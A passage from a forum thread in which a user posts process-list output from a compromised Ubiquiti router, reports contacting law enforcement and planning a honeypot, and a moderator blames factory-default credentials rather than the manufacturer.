     2737  2724 ubnt     S    25400  41%   0% ./win9
     3128  2919 ubnt     S    94836 152%   0% ./i
     3112  2919 ubnt     S    94836 152%   0% ./i
     3103  2919 ubnt     S    94836 152%   0% ./i
     3106  2919 ubnt     S    94836 152%   0% ./i
     3102  2919 ubnt     S    94836 152%   0% ./i
     3087  2919 ubnt     S    94836 152%   0% ./i
     3129  2919 ubnt     S    94836 152%   0% ./i
     3137  2919 ubnt     S    94836 152%   0% ./i
     3104  2919 ubnt     S    94836 152%   0% ./i
     3113  2919 ubnt     S    94836 152%   0% ./i
     3135  2919 ubnt     S    94836 152%   0% ./i
    

    As you can see, the router is now completely compromised.  The overwhelming majority of its processes are devoted to attacks.


  • W

    Just to put a little period on this, as I don't expect to post much more here:

    There are reportedly over 44,000 devices infected in this manner.  I've now been in contact with law enforcement.  At their suggestion, I've volunteered to create a honeypot on a DMZ of my home network by which to investigate and study this malware.  To that end, I've ordered an older, explicitly-vulnerable Ubiquiti router for my home use.

    This is going to be fun.  :D


  • Super Users

    You do realize that any device whose credentials are left at factory defaults and is put out on the internet is vulnerable, and not the fault of the manufacturer?   I could put a $100K Cisco router out there and it would get hacked too in that condition…

    Can't realistically blame Ubiquiti for this.

    Jim

